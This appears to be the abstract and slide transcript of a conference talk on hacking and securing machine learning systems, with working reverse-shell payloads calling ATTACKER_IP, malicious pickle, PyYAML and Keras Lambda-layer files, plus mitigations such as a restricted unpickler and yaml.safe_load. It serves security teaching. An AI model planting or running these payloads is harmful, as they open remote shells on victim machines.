
PyCon APAC 2022 - Hacking and Securing Machine Learning Environments and Systems

Designing and building machine learning systems requires a lot of skill, time, and experience. Data scientists, developers, and ML engineers work together in building ML systems and pipelines that automate different stages of the machine learning process. Once these ML systems have been set up, they need to be secured properly to prevent them from being hacked and compromised.

ML systems are generally built using Python, and some attacks have been customized to take advantage of vulnerabilities present in certain Python libraries such as Joblib, urllib, and PyYAML. Other attacks may take advantage of vulnerabilities present in the custom code written by ML engineers as well. In addition to these, we'll take a look at attack vectors available for certain cloud SDKs (e.g., the SageMaker Python SDK) available in Python. There are different ways to attack machine learning systems, and most data science teams are not equipped with the skills required to secure the systems they build. In this talk, we will discuss in detail the cybersecurity attack chain and how it affects a company's strategy when setting up different layers of security. We will discuss the different ways ML systems can be attacked and compromised, and along the way, we will share the relevant strategies to mitigate these attacks. This includes attacks performed on deployed custom APIs (ML inference endpoints) built using known Python frameworks (e.g., Flask, Pyramid, Django), along with serverless applications and architectures written in Python (e.g., Chalice).

Finally, we will show how to review and assess newly discovered vulnerabilities in Python libraries and packages. We will share some tips and techniques on how to check whether any of your ML systems and environments are vulnerable to certain types of attacks. We'll do this by sharing some examples using ML frameworks such as PyTorch and TensorFlow.
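As a small illustration of that kind of environment check (not from the deck; the package watchlist below is an assumption), the following sketch prints the installed versions of a few ML-related packages so they can be compared against published security advisories. In practice, a dedicated tool such as pip-audit can automate this comparison.

    # Minimal sketch: list installed versions of packages that frequently
    # appear in ML environments, for comparison against known advisories.
    from importlib import metadata

    PACKAGES_TO_CHECK = ["torch", "tensorflow", "joblib", "PyYAML", "urllib3"]  # assumed watchlist

    for package in PACKAGES_TO_CHECK:
        try:
            print(f"{package}=={metadata.version(package)}")
        except metadata.PackageNotFoundError:
            print(f"{package} is not installed")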

Joshua Arvin Lat

July 19, 2022

Transcript

  1. ➤ Chief Technology Officer of NuWorks Interactive Labs
     ➤ AWS Machine Learning Hero
     ➤ Author of 📖 Machine Learning with Amazon SageMaker Cookbook
  2. Author of 📖 Machine Learning with Amazon SageMaker Cookbook: 80 proven recipes for data scientists and developers to perform machine learning experiments and deployments
  3. ATTACKER MACHINE:
         nc -nvl 14344
     VICTIM MACHINE (MALICIOUS FILE):
         mkfifo /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc ATTACKER_IP 14344 > /tmp/ABC
  4. import random
     import string

     def generate_random_string():
         list_of_chars = random.choices(string.ascii_uppercase, k=5)
         return ''.join(list_of_chars)

     def generate_payload(ip="127.0.0.1", port="14344"):
         r = "/tmp/" + generate_random_string()
         commands = [
             f'rm {r}; mkfifo {r}; cat {r} ',
             f'/bin/sh -i 2>&1',
             f'nc {ip} {port} > {r} '
         ]
         return ' | '.join(commands)
  5. import os
     import pickle

     PAYLOAD = generate_payload()

     class SampleClass:
         def __reduce__(self):
             cmd = PAYLOAD
             return os.system, (cmd,)

     def generate_pickle():
         obj = SampleClass()
         with open("model.pkl", "wb") as f:
             pickle.dump(obj, f)
  6. python -m pickletools model.pkl
           0: \x80 PROTO      3
           2: c    GLOBAL     'posix system'
          16: q    BINPUT     0
          18: X    BINUNICODE ' rm /tmp/UJTOU; mkfifo /tmp/UJTOU; cat /tmp/UJTOU | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/UJTOU '
         123: q    BINPUT     1
         125: \x85 TUPLE1
         126: q    BINPUT     2
         128: R    REDUCE
         129: q    BINPUT     3
         131: .    STOP
  7. import pickle
     from flask import Flask

     app = Flask(__name__)  # Flask app serving the inference endpoint

     def load_model():
         model = None
         with open("model.pkl", "rb") as f:
             model = pickle.load(f)
         return model

     @app.route("/predict", methods=["POST"])
     def predict():
         model = load_model()
         # get input value from request
         # perform prediction
         return '', 200

     # torch.load() and joblib.load() also deserialize with pickle under the hood
     import torch
     torch.load("model.pkl")

     import joblib
     joblib.load("model.pkl")
  8. Load Pickle files securely?

     import builtins
     import pickle

     class RestrictedUnpickler(pickle.Unpickler):
         def find_class(self, module, name):
             SAFE_BUILTINS = {'range', 'complex', 'set'}
             if module == "builtins" and name in SAFE_BUILTINS:
                 return getattr(builtins, name)
             raise pickle.UnpicklingError()

     with open("model.pkl", "rb") as f:
         model = RestrictedUnpickler(f).load()
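Restricting which classes can be unpickled is one approach; a complementary mitigation is to verify the artifact's integrity before deserializing it at all. A minimal sketch follows (not from the deck; the expected digest is an assumed value distributed through a trusted channel):

    import hashlib
    import pickle

    # Assumed value: the SHA-256 digest of the trusted model artifact,
    # obtained through a separate, trusted channel.
    EXPECTED_SHA256 = "replace-with-trusted-digest"

    def load_verified_model(path):
        with open(path, "rb") as f:
            data = f.read()
        digest = hashlib.sha256(data).hexdigest()
        if digest != EXPECTED_SHA256:
            raise ValueError(f"Unexpected digest for {path}: {digest}")
        return pickle.loads(data)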
  9. import yaml
     import subprocess

     class Payload(object):
         def __reduce__(self):
             PAYLOAD = ' rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH '
             return (__import__('os').system, (PAYLOAD,))

     def save_yaml():
         with open(r'malicious.yaml', 'w') as file:
             yaml.dump(Payload(), file)
  10. !!python/object/apply:posix.system
      - rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH

      import yaml

      def load_yaml(filename):
          output = None
          with open(filename, 'r') as file:
              output = yaml.load(file, Loader=yaml.Loader)
          return output
  11. Load YAML files securely?

      import yaml

      def safely_load_yaml(filename):
          output = None
          with open(filename, 'r') as file:
              output = yaml.safe_load(file)
          return output
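To see the difference between the two loaders, a small sketch (not from the deck) that parses the malicious.yaml file from the earlier slide with yaml.safe_load: the SafeLoader does not construct arbitrary Python objects, so the !!python/object/apply tag is rejected instead of executed.

    import yaml

    try:
        with open("malicious.yaml", "r") as file:
            yaml.safe_load(file)
    except yaml.constructor.ConstructorError as error:
        # safe_load refuses to build the posix.system call object
        print(f"Refused to construct object: {error}")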
  12. from tensorflow.keras.layers import Input, Lambda, Softmax
      from tensorflow.keras.models import Model
      from tensorflow.keras.optimizers import Adam

      def custom_layer(tensor):
          PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH '
          __import__('os').system(PAYLOAD)
          return tensor

      input_layer = Input(shape=(10,), name="input_layer")
      lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer)
      output_layer = Softmax(name="output_layer")(lambda_layer)
      model = Model(input_layer, output_layer, name="model")
      model.compile(optimizer=Adam(lr=0.0004), loss="categorical_crossentropy")
      model.save("model.h5")
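One way to review such an artifact before loading it is to inspect its serialized architecture for Lambda layers, which can carry arbitrary code. A minimal sketch follows, assuming (this is an assumption, not something shown in the deck) that the HDF5 file stores the architecture JSON in a root attribute named model_config, as recent Keras versions do when saving to .h5:

    import json
    import h5py

    def find_lambda_layers(path):
        # Read the architecture JSON without deserializing or executing the model
        with h5py.File(path, "r") as f:
            raw_config = f.attrs["model_config"]
        if isinstance(raw_config, bytes):
            raw_config = raw_config.decode("utf-8")
        config = json.loads(raw_config)
        layers = config.get("config", {}).get("layers", [])
        return [layer for layer in layers if layer.get("class_name") == "Lambda"]

    suspicious = find_lambda_layers("model.h5")
    if suspicious:
        print("Model contains Lambda layers with embedded code; review before loading:")
        for layer in suspicious:
            print(layer.get("config", {}).get("name"))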
  13. IAM USER → IAM ROLE → NOTEBOOK INSTANCE
      PERMITTED TO ACCESS? / PERMITTED TO ACCESS OR PERFORM THE FOLLOWING ACTIONS

      from sagemaker import get_execution_role
      role = get_execution_role()
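To reason about what a compromised notebook could do with the attached role, here is a minimal sketch (not from the deck; it assumes the role itself is allowed to call STS and IAM) that prints the caller identity and the managed policies attached to the notebook's execution role:

    import boto3
    from sagemaker import get_execution_role

    # Identity that API calls from this notebook are made under
    print(boto3.client("sts").get_caller_identity()["Arn"])

    # Managed policies attached to the notebook's execution role
    role_arn = get_execution_role()
    role_name = role_arn.split("/")[-1]
    iam = boto3.client("iam")
    for policy in iam.list_attached_role_policies(RoleName=role_name)["AttachedPolicies"]:
        print(policy["PolicyName"])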
  14. ATTACKS ON DATA PRIVACY & MODEL PRIVACY
      Model inversion attack
      Model extraction attack
      Membership inference attack
      Attribute inference attack
      De-anonymization attack
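To make one of these concrete, here is a minimal sketch of a confidence-threshold membership inference baseline (not from the deck; the model object, threshold value, and input samples are hypothetical placeholders). The idea is that a record is guessed to have been part of the training set when the model is unusually confident about it.

    THRESHOLD = 0.95  # hypothetical cutoff, tuned by the attacker on data they control

    def guess_membership(model, samples):
        # `model` is a placeholder classifier exposing predict_proba(), and
        # `samples` is a 2-D array of candidate records.
        confidences = model.predict_proba(samples).max(axis=1)
        # True where the top predicted probability exceeds the cutoff,
        # i.e., where the record is guessed to be a training-set member.
        return confidences >= THRESHOLD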
  15. LAMBDA + SCIKIT-LEARN PREDICTION ENDPOINT (behind API GATEWAY)
      LAMBDA + TENSORFLOW PREDICTION ENDPOINT (behind API GATEWAY)
      LAMBDA + FB PROPHET PREDICTION ENDPOINT (behind API GATEWAY)
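The abstract mentions serverless applications written with Chalice; as an illustration of what such a prediction endpoint typically looks like (not from the deck; the app name, model path, and feature handling are assumptions), a minimal sketch:

    import joblib
    from chalice import Chalice

    app = Chalice(app_name="prediction-endpoint")  # hypothetical app name

    # Assumption: the scikit-learn model is bundled with the deployment package
    # as chalicelib/model.joblib. Loading it with joblib still runs pickle-based
    # deserialization, so the artifact must come from a trusted source.
    model = joblib.load("chalicelib/model.joblib")

    @app.route("/predict", methods=["POST"])
    def predict():
        body = app.current_request.json_body
        prediction = model.predict([body["features"]])
        return {"prediction": prediction.tolist()}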